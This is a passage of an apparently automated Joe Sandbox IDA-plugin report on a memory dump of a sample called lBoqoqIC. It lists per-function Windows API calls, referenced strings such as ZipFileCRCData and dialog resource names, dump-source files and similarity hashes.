                                                                                                                • Instruction Fuzzy Hash: 1741C136C00159AACF19FBA2DC56EEF7B35AF15304F24412FF502B2192DB3C5A85C6A9
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004801F0
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecrementH_prologInterlocked
                                                                                                                • String ID: format$hex
                                                                                                                • API String ID: 3164693477-1485289233
                                                                                                                • Opcode ID: e78bfa4c3b28e76ec602a13045f26fb30a7ad3081961aaa0353f1c72c5e02176
                                                                                                                • Instruction ID: 63ac802d9f089038e9c95cc77e0c68553d63bc3e3eef8d01ecc9caa67044fc9e
                                                                                                                • Opcode Fuzzy Hash: e78bfa4c3b28e76ec602a13045f26fb30a7ad3081961aaa0353f1c72c5e02176
                                                                                                                • Instruction Fuzzy Hash: 08312731500249AFCF04EF66C852EEE7BB5EF84308F10846FF815A7292CB789A49D765
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046C884
                                                                                                                  • Part of subcall function 00468117: __EH_prolog.LIBCMT ref: 0046811C
                                                                                                                Strings
                                                                                                                • IDS_CTRL_HEADINGTEXT_BODY, xrefs: 0046C967
                                                                                                                • IDS_CTRL_STATICTEXT_BODY, xrefs: 0046C8D4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: IDS_CTRL_HEADINGTEXT_BODY$IDS_CTRL_STATICTEXT_BODY
                                                                                                                • API String ID: 3519838083-3606236380
                                                                                                                • Opcode ID: d983231e5e4ded4787ff96606f8914af4e0dba78532c44342271eea23bca7ad4
                                                                                                                • Instruction ID: 8154a464002968108653f5dcc75fb85f388f8944d62b225d8e1d3f33522248a0
                                                                                                                • Opcode Fuzzy Hash: d983231e5e4ded4787ff96606f8914af4e0dba78532c44342271eea23bca7ad4
                                                                                                                • Instruction Fuzzy Hash: 0441A170900B159FCB14EFA6C946AAFFBF4EF44324F10461FE052A3281DBB86A44CB95
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: Screen$Type
                                                                                                                • API String ID: 3519838083-617370513
                                                                                                                • Opcode ID: 8b01ae5d27545ad62e6c26f6c2cbcd58978377146c512a43085041379b89473b
                                                                                                                • Instruction ID: 4d38a4c78756a561892016d3518d24bbf6b374d1b1301723247150b4428ad458
                                                                                                                • Opcode Fuzzy Hash: 8b01ae5d27545ad62e6c26f6c2cbcd58978377146c512a43085041379b89473b
                                                                                                                • Instruction Fuzzy Hash: 1831A6307102149BCB25BF658451AFEB762AF80B04F04855FF816AB2C2CB7C9E469789
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00424126
                                                                                                                  • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol
                                                                                                                • String ID: Enabled$Visible
                                                                                                                • API String ID: 386204849-1194824832
                                                                                                                • Opcode ID: f8130d1a5acbb87e7987217ceba4de550b8fe73c33f1e1a00c56b4673b90db14
                                                                                                                • Instruction ID: 727e803c07ceded52639f44ab80efcc3192eb2c7be4f64242e16063d67e17eca
                                                                                                                • Opcode Fuzzy Hash: f8130d1a5acbb87e7987217ceba4de550b8fe73c33f1e1a00c56b4673b90db14
                                                                                                                • Instruction Fuzzy Hash: 0321043220952536DA0676269C87EEF325D8F86378F30070FF921651D2EF6D669343AE
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: ZipFileCRCData$ZipFileCRCInfo
                                                                                                                • API String ID: 3519838083-379976688
                                                                                                                • Opcode ID: 027991c6773f67ed7ff06815a17ef31d95307381e26db3317ca2e5c28c7bf88a
                                                                                                                • Instruction ID: bf1fec61cde53dc7334019232a03e174b5150932d6ab1f9396e4793b92ea1ffe
                                                                                                                • Opcode Fuzzy Hash: 027991c6773f67ed7ff06815a17ef31d95307381e26db3317ca2e5c28c7bf88a
                                                                                                                • Instruction Fuzzy Hash: 0921E431A102009BDB58FB628851BBEB3A5AF81358F044A1FE416AB2C1DB7CAD45C758
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 0045807D
                                                                                                                • OffsetRect.USER32(?,?,?), ref: 004580C0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorOffsetRect
                                                                                                                • String ID: R
                                                                                                                • API String ID: 1473908254-1466425173
                                                                                                                • Opcode ID: 87402b30b09adf95f20f316e5906a4d698248f703c8e0abd12351f7576789b39
                                                                                                                • Instruction ID: b24df7492ff9630f9153139915470f7fb99dadaa0dd5e0d8afb21a39ace5a7f1
                                                                                                                • Opcode Fuzzy Hash: 87402b30b09adf95f20f316e5906a4d698248f703c8e0abd12351f7576789b39
                                                                                                                • Instruction Fuzzy Hash: E5318D7160061AEFCF14EFA5C8849AEBBB9FF48315B00402EFA4597242CB35A955CF94
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: Event$Events
                                                                                                                • API String ID: 3519838083-2431416839
                                                                                                                • Opcode ID: 72f999b65ca79ff045f81e014d9002d8c138294f9f518baaf714218419d64d07
                                                                                                                • Instruction ID: 0449487f76448c15c9ca2abf4542bc0cedd1a6ef3351e798faa6b9fdc01194ba
                                                                                                                • Opcode Fuzzy Hash: 72f999b65ca79ff045f81e014d9002d8c138294f9f518baaf714218419d64d07
                                                                                                                • Instruction Fuzzy Hash: 2621B531750204ABDF54BF6688917BE73A5AB80B08F00893FA9169B281CB7C9D49CB58
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0042851A
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                                                • ShellExecuteA.SHELL32(00000000,print,00000000,?,00000000,00523A30), ref: 004285A0
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$DecrementExecuteIncrementShell
                                                                                                                • String ID: print
                                                                                                                • API String ID: 254888685-366378086
                                                                                                                • Opcode ID: d6f795a2272b4998821c805ec25e9288379cf5329f8cf8f2ed4a70f64ceb31e5
                                                                                                                • Instruction ID: ee7be14681b1b8fb26f5df937825c69c377f3cbfc24692162d5aaee1b3869af0
                                                                                                                • Opcode Fuzzy Hash: d6f795a2272b4998821c805ec25e9288379cf5329f8cf8f2ed4a70f64ceb31e5
                                                                                                                • Instruction Fuzzy Hash: 3821C475D04218BBCF15EBAAD806BDEBF74EF04314F10406FF405B2182DB795B858AA9
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0048097D
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecrementH_prologInterlocked
                                                                                                                • String ID: CRC$ZipFileCRCData
                                                                                                                • API String ID: 3164693477-3255046153
                                                                                                                • Opcode ID: 052f0ea71f7ca29ef601de8adeb54f974d86adab7fb7bef832aed737f070183d
                                                                                                                • Instruction ID: 6ddc117d37461e98a407975368472051323615dc9f506777e19718c44266dbe0
                                                                                                                • Opcode Fuzzy Hash: 052f0ea71f7ca29ef601de8adeb54f974d86adab7fb7bef832aed737f070183d
                                                                                                                • Instruction Fuzzy Hash: C721BE72911508AFD708EB61CD42EFEB778EB51314F10422EF426A31D1EB786B498665
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __ftol
                                                                                                                • String ID: cur$invalid mode
                                                                                                                • API String ID: 495808979-3413740846
                                                                                                                • Opcode ID: 43d4c854e94dc27f4f33da026b2d7fb4947327369ca340bd0a2fa02f4ca8866f
                                                                                                                • Instruction ID: 62864d8fd425b32e9b942a475de88a9d3126e450f522763bc0ab3dfddb68d389
                                                                                                                • Opcode Fuzzy Hash: 43d4c854e94dc27f4f33da026b2d7fb4947327369ca340bd0a2fa02f4ca8866f
                                                                                                                • Instruction Fuzzy Hash: BF019672B4131033E511766A6C83FAF368C8FD2759F14092BF740691C3E79A661143EE
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00424089
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog__ftol
                                                                                                                • String ID: Enabled$Visible
                                                                                                                • API String ID: 2123048387-1194824832
                                                                                                                • Opcode ID: bd5ebb2f9195828ef6a364d451bf49165ec3861c4be1c51869e39e453eeeda88
                                                                                                                • Instruction ID: a06317538c8d1a01a9211c07e988773db040fce767a5f3220770bb9cebb87b49
                                                                                                                • Opcode Fuzzy Hash: bd5ebb2f9195828ef6a364d451bf49165ec3861c4be1c51869e39e453eeeda88
                                                                                                                • Instruction Fuzzy Hash: BB01263610592476D6027B669C02FCF361C9F46358F14040FF91419092EF6E628383EE
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00430752
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiVerifyPackageA), ref: 00430791
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$AddressLibraryLoadProc
                                                                                                                • String ID: MsiVerifyPackageA
                                                                                                                • API String ID: 2554327035-617025837
                                                                                                                • Opcode ID: 790839f8c71512b99d57245c700d90bd05dc14ba742a6c62093e8d9f9db9e15e
                                                                                                                • Instruction ID: 5317c853de453fce0b51c79f0143e77c63761dfe43dab1a235051b81588ab865
                                                                                                                • Opcode Fuzzy Hash: 790839f8c71512b99d57245c700d90bd05dc14ba742a6c62093e8d9f9db9e15e
                                                                                                                • Instruction Fuzzy Hash: 6E014936A00340B6DB00B7769C16FDF261C9F81754F00402FF816962C2DB7CDB8286A9
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0045047E
                                                                                                                  • Part of subcall function 0044EB4E: __EH_prolog.LIBCMT ref: 0044EB53
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlocked
                                                                                                                • String ID: Checked$Variable
                                                                                                                • API String ID: 2206737547-4072040582
                                                                                                                • Opcode ID: cfd47e58b2ab7f99a1e7c810ae55f731cdbff27362dadb22b499d4ca9119f751
                                                                                                                • Instruction ID: b557a114fa5ee7a457287e9b34bc29c61c141e3a3655fe4132f242bde0297ff1
                                                                                                                • Opcode Fuzzy Hash: cfd47e58b2ab7f99a1e7c810ae55f731cdbff27362dadb22b499d4ca9119f751
                                                                                                                • Instruction Fuzzy Hash: 2D0161356002046ACB19FB63C856AFE7766EFC1318F04856FF512A72C2CF7C6946C659
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00450520
                                                                                                                  • Part of subcall function 0044EDBD: __EH_prolog.LIBCMT ref: 0044EDC2
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlocked
                                                                                                                • String ID: Checked$Variable
                                                                                                                • API String ID: 2206737547-4072040582
                                                                                                                • Opcode ID: b07079e5009ae732146f6306a23669b85483aaddad9956d1c995492f19cdc0cf
                                                                                                                • Instruction ID: 1f622e6c72d5bdf31cba8138abd98f018be742c2bdca4c4ef77431c36a3b9ab4
                                                                                                                • Opcode Fuzzy Hash: b07079e5009ae732146f6306a23669b85483aaddad9956d1c995492f19cdc0cf
                                                                                                                • Instruction Fuzzy Hash: 13018435640204BFDB20EB52D846FED7B26EB80724F00C51EF516AB2C0C7B9AA41DB98
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0044835E
                                                                                                                  • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                                                • GetWindowRect.USER32(?,00000000), ref: 00448371
                                                                                                                  • Part of subcall function 004C9502: MoveWindow.USER32(?,?,00000001,?,?,?,?,0040A7C9,?,?,?,?,00000001,?,00000000), ref: 004C951E
                                                                                                                  • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447D35
                                                                                                                  • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447D41
                                                                                                                  • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447D9C
                                                                                                                  • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447DF8
                                                                                                                  • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447E04
                                                                                                                  • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447E0D
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$MoveShow
                                                                                                                • String ID: @{D
                                                                                                                • API String ID: 1313642680-849441126
                                                                                                                • Opcode ID: 0565c334a675da7c4357cd9acd7f6c50ea5dba766a9dad78ff27870ac3f11563
                                                                                                                • Instruction ID: 9b8ab06f5678c24dba60b2739052b10a2f896333f4598c702bdb1458a4d54235
                                                                                                                • Opcode Fuzzy Hash: 0565c334a675da7c4357cd9acd7f6c50ea5dba766a9dad78ff27870ac3f11563
                                                                                                                • Instruction Fuzzy Hash: F2014F76900518BFDB15EFA9CD45EEEF7B8EF48300F00005EE512A31A0DA74AD01CB54
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046458E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: DecrementH_prologInterlockedlstrlen
